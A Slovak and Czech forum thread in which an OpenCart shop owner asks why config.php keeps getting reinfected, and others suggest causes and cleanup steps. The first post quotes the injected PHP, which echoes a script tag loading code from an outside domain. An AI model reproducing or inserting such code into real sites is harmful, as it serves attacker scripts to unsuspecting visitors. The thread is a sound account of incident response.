Open cart napada asi robot

Viete mi niekto poradit co je zle, jeden eshop co som rozbehal na opencart systeme napada stale robot, v config.php a aj inych suboroch z vecera do rana najdem kod:

$ GLOBALS
['_1078704644_']=Array(); ?><
? function _681861654($i){$a=Array();return base64_decode($a[$i]);} ?>if(empty($jrnp)) {$jrnp = "<script type=\"text/javascript\" src=\"http://AZHINEHPS.COM/wp-content/themes/rttheme16/a9k9hbqc.php?id=573629\"></script>";echo $jrnp;}

Vcera som spravil upgrade na poslednu verziu a rano skusam a vidim ze eshop zase nesiel, dnes som nasiel povkladany tento kod zase ...

Vie niekto dat tip co je zle preco sa tam dostane ten robot ...?

Velka vada za pomoc

Zdravím,
může byt chyba v zabezpečení hostingu.
Zkuste dát přístupová práva na config.php a index.php pouze pro čtení.

Taky se zkuste zeptat na podpoře hostingu jestli nezaznamenavaji nějaké útoky na dalších webech...
Nebo si zkuste ještě kdyztak nechat zaslat acceess.log (log přístupů) na vas web a zjistit jak se tam útočník dostal.

Noo skusim napisat este na hosting, pristupove prava na read som nastavil uz aj davno aj na cofig.php a aj na prevazne vestky php subory open cart systemu. To este ked eshop bezal na starom syste,e 1.4.7, behom par hodin to bolo zase vsetko napadnute a povkladany ten kod co som pridal, alebo nejaky podobny.

Teraz som spravil update na najskor 2.0.2 co drzalo celkom dobre (asi az tyzden), potom prisla notifikacia ze je dostuna verzia 2.0.3.1, ako som spravil update tak zrazu som vecer zbadal ten kod vlozeny v config.php a do rana cely cast katalogu, alebo teda open cart eshop cast na strane zakaznika lahla, administracia isla dalej...

Složka install je smazaná?
Upload souborů máte povolený?

ano, zlozka install je zmazana a upload suborov je povoleny (ak teda je ymsleny upload na server cez ftp, alebo ja neviem veci cez admina eshopu)

A nemáte zavirovaný ten počítač ze kterého se tam připojujete přes FTP?

nie pocitac je cisty, ono to zacalo po asi 2-3 rokoch behu stranky, znicoho nic web padol s tym ze boli povkladane tie kody

par krat som tam len nahral povodnu verziu, pomenil prava len na read na php subory a niekedy za cas bol pokoj neskor uz na druhy den bolo napadnuter vsetko zase.

web je na hostingu providera, to len teraz ako to zacalo blbnit tak riesim ako to zastavit

Tak pak nevím, ale přesně takto se projevují nějkteré malware v počítači. Samo se to připojí na nastavené účty přes ftp a napadne soubory jako index.php a config.php

Este ma napadlo ze ale keby to bol nejaky malware v pocitaci tak by to muselo napadnut tych webov viac, kedze ftp uctov tam mam viac a cely cas to robi len tento jeden web co riesim. Ak by to ale bolo tak ako pises tak teoreticky by to mohol sposobit aj niekto iny kto ma na ftp pristup, kedze pristup tam nemam len ja...

Ano, to by vysvětlovalo, stává se mi to často že klienti mají malware a já to pak čistím.

Podobný problém jsem řešit na jednom webu. Na webu byly v ruznych složkach zanořene backdoors skripty, ktere automaticky po nejake dobe nahraly smazane soubory zpet. Soubory se tvářili jako by tam patřili (dle názvu), ale musel jsem komplet smazat web a nahrat ze zalohy, protoze hledat jednotlive soubory slo pouze pres porovnavani obsahu, coz bylo casove narocne. Databazi to neovlivnilo.

Najit napadene soubory bylo mozno pouze pres LOG v php. Zaroven jsem pro jistotu zmenil prihlasovaci udaje i zamknul upload.... coz vsak nepomuze pokud je na webu php skripty, ktery umozni upload pres webove rozhranni.

Už asi 5x jsem odvirovával 1.5.6.4 vždy se dostane zpět.

do system logs se nahraje php soubor, adresa chybového souboru je přepsána na .php soubor - tím se asi spouští

po vyčištění, změně hesel ftp mysql a ujištění se, že nebude nikde uloženo opět napadeno.

Soubory odesílají email spam a nesou název wp-info jakoby se mělo jednat o wordpress.

Ví někdo více informací? Má 1564 díru v bezpečnosti?